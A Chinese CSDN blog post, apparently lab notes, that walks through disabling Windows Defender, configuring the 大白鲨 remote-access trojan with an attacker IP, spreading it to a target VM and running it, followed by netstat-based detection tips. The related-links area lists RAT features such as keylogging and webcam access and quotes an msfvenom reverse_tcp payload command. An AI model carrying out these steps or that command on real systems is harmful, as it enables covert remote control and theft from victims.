大白鲨生成Windows木马(仅供参考不可实践)

于 2023-12-24 10:09:37 发布
阅读量647 收藏 9
点赞数 8
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207482/article/details/135141581
版权

一、学习方法

一个正确的学习方法往往比学习更为重要

方法一:学习技术的本质性作用 (第一性定律)

— 帮助我们解决的问题是什么

— 产生的原因/价值

方法二:在工作中到底如何使用?

方法三:技术是由人发明出来的,人的灵感来源于生活,所有的技术都能跟生活结合在一起

方法四:不要怕难,没有学不会的技术点,只有你不愿意学习的技术点

方法五:操作是没有标准答案的,所有的选择都是根据特定场景判断的

 

二、计算机木马

1、概述

木马程序也可以称之为后门程序,具有欺骗性质,导致受害者信息泄露,窃取文件,篡改数据信息。木马伪装依附在游戏、视频、图片.......,诱使用户打开激活木马。

2、木马的植入原理

 

fdc449f8bb66087c85e3093a01a68658.png

##################### 实验三(实现木马攻击实验) #####################

1、准备工作

① 准备两台Windows10的虚拟机,分别命名为攻击机、靶机

② 两台虚拟机之间的网络联通

 

 

2、在攻击机、靶机中安装压缩解压工具

① 将压缩软件拖拽到虚拟机中

② 双击安装包,进行安装(默认路径——选择install——选择Close)

注意:安装完在桌面上找不到,去开始菜单中找即可

③ 安装完后,需要对7z进行配置(工具——选项——选择需要压缩解压的文件类型)

 

cb2b538290a6e76b39a8d6dc8894b4b4.png

3、关闭实时保护(防止大白鲨被灭掉)

右击桌面空白处——选择个性化——主页(进入Windows 设置)

更新和安全——WIndows安全中心——病毒和威胁防护——管理设置——关闭实时保护

 

34d44b3e5a7bfba77f48205b24e92e7e.png

4、配置木马

① 解压大白鲨木马,双击点开程序,进入大白鲨

注意:确保下方只显示蓝色字体,如果有红色字体需要马上解决,以下是正确显示

 

e58907eb431fa9378bc5404f200ab3a5.png

② 创建木马

配置程序——写黑客端的IP地址——选择不安装直接运行——生成服务端

注意:将生成的大白鲨木马直接保存到桌面上即可

 

d988526b6b97d59c55387dad5f2d61c8.png

5、传播木马

将攻击机上创建的大白鲨压缩,以压缩包的形式复制,粘贴到靶机中

 

6084b9d5a763c6b0ea2362db4835f861.png

6、启动木马(在靶机中进行操作)

① 关闭掉靶机上的实时保护,防止大白鲨木马被灭掉

② 解压大白鲨木马

③ 右击大白鲨——选择属性——兼容性——选择兼容Win7系统

 

38ffaf39b1053065e5fb2b490d9aa6c1.png

④ 双击运行大白鲨即可

注意:会听到“有主机上线请注意”,同时在攻击机上看到有靶机上线,如下图所示

 

71ede750d87358359c9cb8463fb652e1.png

7、实现远程控制

三、如何防范计算机木马

##################### 实验四(课外补充,可以自己研究一下) ###################

Win+R——cmd——调用出命令界面

1、运行netstat -nao //查看可以建立的连接

但以上操作只能查看对方设备连接的IP地址信息,无法查看连接的程序

2、运行netstat -anb //查看可以建立的连接以及对方使用的程序

 

546e8a877ad964c9db8055837d59bc74.png

 

10a9112bd8e144bf5aafd13017c9d9dd.png

 

Lyx-0607
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
大白鲨远控1.5共享版
06-08
大白鲨远控1.5共享版是专业超级远程控制。超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机! ----------------
大白鲨远控
09-04
大白鲨远程控制软件,经典的远程控制软件,功能完整,支持屏幕查看、键盘记录、远程摄像头开启等等一些列功能,功能都经过本人测试。
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 2996
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
神奇木马
m0_50865437的博客
10-05 251
神奇木马 1、准备虚拟机win7和win2003 2、将windows7和windows2003ip在同一网段,网络连接放在VMnet1 3、完成上一步测试一下虚拟机的连通性 4、利用注册编辑表打开445端口 5、将hack.iso镜像连到windows2007,将大白鲨解压到windows2007里 6、利用大白鲨制作木马,在配置服务打开 7、生成DBSServer.exe 8、 将NTSCan拖到虚拟机, 使用NTSCan进行扫描 9、在windows7执行net use \192.16
大白鲨最新版
11-30
大白鲨最新免杀 有可能被杀软误报病毒 请关闭杀软和防火墙后重试
大白鲨远控2010正式版
12-16
完美破解 2010大白鲨正式版
68-68.渗透测试-生成木马获取shell(Windows).mp4
最新发布
05-10
68-68.渗透测试-生成木马获取shell(Windows).mp4
让所有木马都不起作用的方法(变态)
09-30
木马通常伪装成合法程序,诱导用户下载安装,一旦激活,便能在用户不知情的情况下远程控制计算机,从而窃取敏感信息、进行非法活动,甚至将受害者的电脑变为"肉鸡",即被控制的计算机。 【木马的危害】 1. 数据...
特洛伊木马可生存性研究及攻防实践
03-12
特洛伊木马可生存性研究及攻防实践 攻防实践
一键Windows木马插件 清理工具
09-22
有效防止木马与恶意软件变名藏匿 独创清理技术,清理能力远远高于同类软件 安全稳定 脚本库即时更新,查杀能力与时俱进 随时上网获取支持 自由定制 支持多语言环境 用户自由做主是否清理 外部工具及软件的支持
大白鲨2010远程控制
04-14
大白鲨2010远程控制 大白鲨2010远程控制 大白鲨2010远程控制
易语言模仿大白鲨远程控制源码
07-25
压缩包里有三个模块,两份源码,一篇说明. 模块大部分是自己写的,一部分是修改自易论坛的源码.绝无毒害成分.人品保证! ^_^ 控制端.启动后或许会被杀(你可以检查源码,无毒害,无资源无模块),但被控端不会被杀. 谁能告诉我这是为什么? 杀毒软件疯了!? 被控端.不会写注册表自启动项,不会隐藏进程,注册系统服务等等..仅仅是个框架,可以直接编译运行... 视频捕获,屏幕截图等等功能,在调试模式下会卡,编译后试试吧 ^_^ 被控端使用了核心支持库和数据压缩支持库.本机测试编译后大小为500K左右(需要压缩). 配合斩月下载者吧 ^^ ------------------------------------- 如果你觉得不错或者对你有帮助,精神上赞一个. 如果你觉得很垃圾,删除也就是按一个按钮罢了.. -------------------------------------- Estel msn: see@lijue.net
大白鲨远控1.4大白鲨远控1.4
09-24
大白鲨远控1.4 运行平台:Win2K、WinXP、Win03、WinVista、Win07、(Win2008没测试) 更新日志: 1.更新网络模块,可同时上线上万主机 2.屏幕模块,添加键盘发送、图片保存、透明区域截取、全屏模式、屏幕缩放模式、组合键发送=;(核心算法为DG大哥的,博客iamgyg.blog.163.com) 3.更新视频模块,支持USB无驱视频,传输速度流畅,添加 IntelIndeo(R)VideoR3.2 和 IndeoVideo5.04 编码 4.服务端添加非正常断线探测; 5.进程模块(添加显示进程创建时间,以及优化代码) 6.服务模块(添加已启动的服务的启动时间查看还有PID,以及优化代码) 7.注册表模块,以及代码优化 8.窗口模块(添加PID与窗口进程所在路径查看) 9.添加主机信息复制, 10.添加判断WIN7系统 11.其它更新 修正BUG 1.文件管理的文件修改时间显示错误。 2.时间久了会可能会出现播放有主机下线声音(实际上没看到主机下线) 3.修复win7系统下注入进程后无法创建线程,导致无法连接网络, 4.修复截取系统登录界面白屏 软件简介: DATA文件夹里面的有两个RAR文件,分配为两个功能完全相同的DATA.FILE: “DATA(注入进程兼容Win7).rar” //该DATA 无壳 118KB ,压缩 54KB "DATA(注入进程不兼容Win7).rar"// 该DATA无壳 399KB ,压缩 177KB 不带DLL文件! 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.键盘记录:可以查看对方输入了哪个键盘按键。 10.附加功能:分为“信息查看”与“插件管理”。 信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! 插件管理”能上传插件指定的插件使用相应的功能。 11.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 12.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! 筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 修改配置:可以修改上线信息,如IP、端口或者备注! 发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 注:非法使用后果自负,
大白鲨远程控制1.6 2010Beta1
04-14
友情提示:杀软可能会报毒,郑重声明软件为绿色无后门无木马,报毒是因为杀软把黑软都列入黑名单,运行前请关闭杀软在做运行,不符合以上条件请不要下载
大白鲨远程控制 2010 正式版
09-25
大白鲨远程控制 2010 正式版 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.5,2010Beta 版本 单一exe,不带DLL文件(无可没配置前118KB,压缩54KB)! 注入进程兼容win7/win8/vista 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.附加功能:分为“信息查看”与“插件管理”。 信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! 插件管理”能上传插件并启用对应的功能!“比如HTTP代理”。 10.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 11.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! 筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 修改配置:可以修改上线信息,如IP、端口或者备注! 发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 本软件是自解压打包了的,可能报毒,怕毒的朋友请勿下载。
大白鲨远控v1.5绿色版
04-30
大白鲨远控v1.5绿色版】是一款远程控制软件,它的主要功能是让用户能够通过网络远程操控另一台计算机。"绿色版"通常意味着该软件无需安装,下载后即可直接运行,不写入系统注册表,方便携带且不易留下痕迹。然而,...
计算机木马
weixin_44520274的博客
01-29 1617
木马 1.计算机木马(Computer Trojan Horse) 指具有欺骗、盗取受害者计算机敏感信息以及恶意操控等危害的程序 木马程序一般隐藏在图片、小游戏、视频等文件中 2.木马植入过程 过程: 1.配置木马 木马伪装、信息反馈 2.传播木马 软件下载、邮件附件、淫秽图片等 3.启动木马 自动启动、潜伏待命 4.建立连接 主动、被动连接 5.远程控制 3.木马程序演示 配置“大白鲨”...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 2990
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
msfvenom 生成windows的exe木马
06-02
生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lyx-0607

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值